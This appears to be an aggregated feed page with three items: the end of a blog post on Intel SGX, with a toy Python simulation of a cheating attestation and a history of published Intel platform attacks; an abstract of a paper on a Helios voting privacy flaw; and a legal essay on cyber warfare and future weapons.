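A minimal sketch of that cheating scenario, with HMAC standing in for the TPM's quote signature and made-up component names: the TPM honestly extends its PCR (TPM 1.2 style, SHA-1 of the old value concatenated with the measurement digest) and signs whatever it has accumulated, so a processor that replays the expected measurements instead of the code it actually launched yields a quote that verifies perfectly.

import hashlib, hmac

def extend(pcr, measurement):
    # TPM 1.2-style extend: new PCR = SHA-1(old PCR || SHA-1(measurement)).
    return hashlib.sha1(pcr + hashlib.sha1(measurement).digest()).digest()

def tpm_quote(pcr, tpm_key):
    # The TPM faithfully signs whatever PCR value it has accumulated.
    return hmac.new(tpm_key, pcr, hashlib.sha1).digest()

tpm_key = b"key that never left this honest TPM"
expected_chain = [b"SINIT", b"tboot", b"trusted-hypervisor"]

# Honest launch: the CPU reports the real measurements of what it ran.
pcr = b"\x00" * 20
for component in expected_chain:
    pcr = extend(pcr, component)
honest_quote = tpm_quote(pcr, tpm_key)

# Backdoored CPU: it actually launched b"evil-hypervisor", but on a trigger it
# replays the expected measurements to the TPM, whose keys never leaked and
# which behaves correctly -- yet the quote it signs tells a lie.
pcr = b"\x00" * 20
for reported in expected_chain:  # not what really ran
    pcr = extend(pcr, reported)
cheating_quote = tpm_quote(pcr, tpm_key)

print("remote verifier sees identical quotes:", honest_quote == cheating_quote)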

So, perhaps, the idea of a separate TPM actually does make some sense after all?

What about just accidental bugs in Intel products?

Conspiracy theories aside, what about accidental bugs? What are the chances of SGX being really foolproof, at least against those unlucky adversaries who didn't get access to the private signing keys? Intel processors have become quite complex beasts these days. And if you also throw in the Memory Controller Hub, the result is an unimaginably complex beast.

Let's take a quick look back at some spectacular attacks against Intel “hardware” security mechanisms. I put “hardware” in quotation marks because most of these technologies are really software, like most things in electronics these days. Nevertheless, “hardware-enforced security” has a special appeal to many people, often creating the impression that these must be ultimate, unbreakable technologies...

I think it all started with our exploit against the Intel Q35 chipset (slides 15+), demonstrated back in 2008, which was the first attack to compromise otherwise hardware-protected SMM memory on Intel platforms (some earlier attacks against SMM assumed that SMM was not protected, which was the case on many older platforms).

This was shortly followed by another paper of ours on attacking Intel Trusted Execution Technology (TXT), which discovered and exploited the fact that TXT-loaded code was not protected against code running in SMM mode. We used our previous Q35 attack on SMM, as well as a couple of new ones we found, to compromise SMM, plant a backdoor there, and then compromise the TXT-loaded code from there. The issue highlighted in the paper has never really been correctly patched. Intel has spent years developing something called STM, which was supposed to be a thin hypervisor for SMM code sandboxing. I don't know whether the Intel STM specification has eventually been made public, how many bugs it might introduce on systems that use it, or how inaccurate it might be.

In the following years we presented two more devastating attacks against Intel TXT (neither of which depended on a compromised SMM): one exploited a subtle bug in the processor's SINIT module that allowed us to misconfigure VT-d protections for TXT-loaded code, and the other exploited a classic buffer overflow, also in the processor's SINIT module, this time allowing us not only to fully bypass TXT, but also to fully bypass Intel Launch Control Policy and hijack SMM (several years after our original papers on attacking SMM, the old bugs had been patched, so this was also attractive as yet another way to compromise SMM for whatever other purpose).

Invisible Things Lab has also presented the first, and as far as I'm aware still the only, attack on an Intel BIOS that allowed reflashing the BIOS despite Intel's strong “hardware” protection mechanism meant to allow only digitally signed code to be flashed. We also learned about the secret processor in the chipset used to execute Intel AMT code, and found a way to inject our custom code into this special AMT environment and have it executed in parallel with the main system, unconstrained by any other entity.

This is quite a list of significant Intel security failures, which I think gives us something to think about. At the very least, it shows that just because something is “hardware enforced” or “hardware protected” doesn't mean it is foolproof against software exploits. Because, it should be clearly said, all the exploits mentioned above were pure software attacks.

But, to be fair, we have never been able to break Intel's core memory protection (ring separation, page protection) or Intel VT-x. Rafal Wojtczuk probably came closest with his SYSRET attack, an attempt to break ring separation, but ultimately Intel's excuse was that the problem lay with the OS developers, who didn't notice subtle differences in the behavior of SYSRET between AMD and Intel processors and didn't make their kernel code defensive enough against the Intel processor's odd behavior.

We have also demonstrated rather impressive attacks bypassing Intel VT-d, but, again, to be fair, we should mention that the attacks were possible only on those platforms that Intel had not equipped with so-called Interrupt Remapping hardware, and that Intel knew such hardware was indeed needed and had been planning it a few years before our attacks were published.

So, is Intel SGX gonna be as insecure as Intel TXT, or as secure as Intel VT-x....?

The bottom line

Intel SGX promises some incredible functionality – the ability to create protected execution environments (called enclaves) within an untrusted (compromised) Operating System. However, for SGX to be of any use on a client OS, it is important that we also have technologies to implement trusted output and input from/to an SGX enclave. Intel currently provides few details about the former and openly admits it doesn't have the latter.

Still, even without trusted input and output technologies, SGX might be very useful in bringing trust to the cloud, by allowing users to create trusted VMs inside untrusted provider infrastructure. However, at the same time, it could allow the creation of applications and malware that cannot be reverse engineered. It's quite ironic that these two applications (trusted cloud and irreversible malware) are mutually bound together, so that if one wanted to add a backdoor to allow the A/V industry to analyze SGX-protected malware, that very same backdoor could be used to weaken the trustworthiness guarantees of user VMs in the cloud.

Finally, a problem that is hard to ignore today, in the post-Snowden world, is the ease with which Intel itself could backdoor this technology. In fact, Intel doesn't need to add anything to its processors – all it needs to do is give away the private signing keys used by SGX for remote attestation. This makes for a perfectly deniable backdoor – nobody could catch Intel at it, even if the processor were analyzed transistor by transistor, HDL line by line.

As a system architect I would love to have Intel SGX, and I would love to believe it is secure. It would allow us to further decompose Qubes OS, specifically to remove the hypervisor from the TCB, and probably even more.

Special thanks to Oded Horowitz for turning my attention towards Intel SGX.
28 Sep 16:29

Attacking and fixing Helios: An analysis of ballot secrecy, by Veronique Cortier and Ben Smyth

Helios 2.0 is an open-source web-based end-to-end verifiable electronic voting system, suitable for use in low-coercion environments. In this article, we analyse ballot secrecy in Helios and discover a vulnerability which allows an adversary to compromise the privacy of voters. The vulnerability exploits the absence of ballot independence in Helios and works by replaying a voter's ballot or a variant of it; the replayed ballot magnifies the voter's contribution to the election outcome, and this magnification can be used to violate privacy. We demonstrate the practicality of the attack by violating a voter's privacy in a mock election using the software implementation of Helios. Moreover, the feasibility of an attack is considered in the context of French legislative elections and, based upon our findings, we believe it constitutes a real threat to ballot secrecy. We present a fix and show that our solution satisfies a formal definition of ballot secrecy using the applied pi calculus. Furthermore, we present similar vulnerabilities in other electronic voting protocols -- namely, the schemes by Lee et al., Sako & Kilian, and Schoenmakers -- which do not assure ballot independence. Finally, we argue that independence and privacy properties are unrelated, and non-malleability is stronger than independence.
27 Sep 07:32

Guest Post: Resolving Cyber Issues Sets the Stage for Future Weapons

by Eric Jensen

[A note from Ryan Goodman: On Monday, Professor Michael Schmitt helped launch Just Security with a Guest Post on the law of cyber conflict. Professor Eric Talbot Jensen accepted our invitation to write on the topic of the next generation of technology and the law of armed conflict (LOAC), especially in light of his forthcoming article, The Future of the Law of Armed Conflict: Ostriches, Butterflies, and Nanobots, 35 Michigan Journal of International Law (forthcoming 2014). I encourage readers who are interested in this topic to read Eric’s full-length article as well. It is a great exploration of the next technological frontier for LOAC.]

As observed by former legal advisor to the U.S. State Department, Harold Koh, “Increasingly, we find ourselves addressing twenty-first century challenges with twentieth-century laws.”  This has become a common mantra among those who are tasked with applying current law to modern warfare.  Nowhere has this discussion been more hotly debated than in the area of cyber warfare, with academics, practitioners and even governments taking views across the spectrum; some advocate that the current law is sufficient to regulate cyber warfare with no modification, others argue that current law is a solid foundation but some modification or evolution may be necessary, and still others advocate for new laws to adequately regulate this new technology.

With respect to the vast majority of armed conflicts that will occur in the near future, I place myself in the middle category, believing that for most armed conflicts, current laws concerning jus ad bellum and jus in bello are sufficient.  However, as advancing weapons technologies make their way into armed conflicts, their use will require an evolution of how we understand and apply certain legal principles.  For example, within the jus in bello, the current definition of “attack” as an act of violence may be too narrow to account for the broadened spectrum of activities that can be accomplished through cyber means.  These activities may not look like traditional “violence” but may still leave the victim feeling “attacked.”  Similarly, our understanding of the fundamental principles of distinction and discrimination may need to adapt to cyber tools that infect hundreds of thousands of computers, including civilian computers, in order to specifically “attack” one targeted system which is a lawful military objective.  The recently published Tallinn Manual on the International Law Applicable to Cyber Warfare acknowledges many of these concerns, and recognizes current law may need to evolve to adequately address possible uses of cyber capabilities.

The resolution of how the law applies to cyber technologies is vitally important for the use of cyber in future conflicts.  It will also likely set the stage for resolving similar questions with respect to a host of future technologies that are waiting in the wings.

For example, the processes of miniaturization and the weaponization of nanotechnology promise to create a host of weapons that will challenge the traditional application of the current law.  Nanobots will be invisible to the naked eye and can swarm across a border and implant themselves in people or on materiel and collect data. Such an operation may be analogous to traditional spying, but a country that is subject to millions of these nanocollectors may feel the victim of a use of force or armed attack, especially if the same nanobots also carry a latent destructive capability that can be triggered remotely at some time in the future.

Similarly, advances in genomics and virology may allow the creation of a virus coded specifically to an individual’s DNA or group’s genetic or chemical characteristics.  Like computer malware, the virus may infect numerous “hosts” without doing much harm other than creating a mass transport system of sneezing or coughing to get the virus to the intended target where it has lethal effect.  Advanced weapons such as micro drones, robots and other autonomous weapons systems will also put pressure on the specific application of current legal norms.

With advanced technologies on the cusp of development and employment such as those mentioned above, the resolution of the legal issues surrounding cyber operations will set the stage for similar resolution of these advancing technologies.  Effectively evolving legal norms to regulate cyber operations will allow the international community to adapt the law adequately to cover future weapon systems.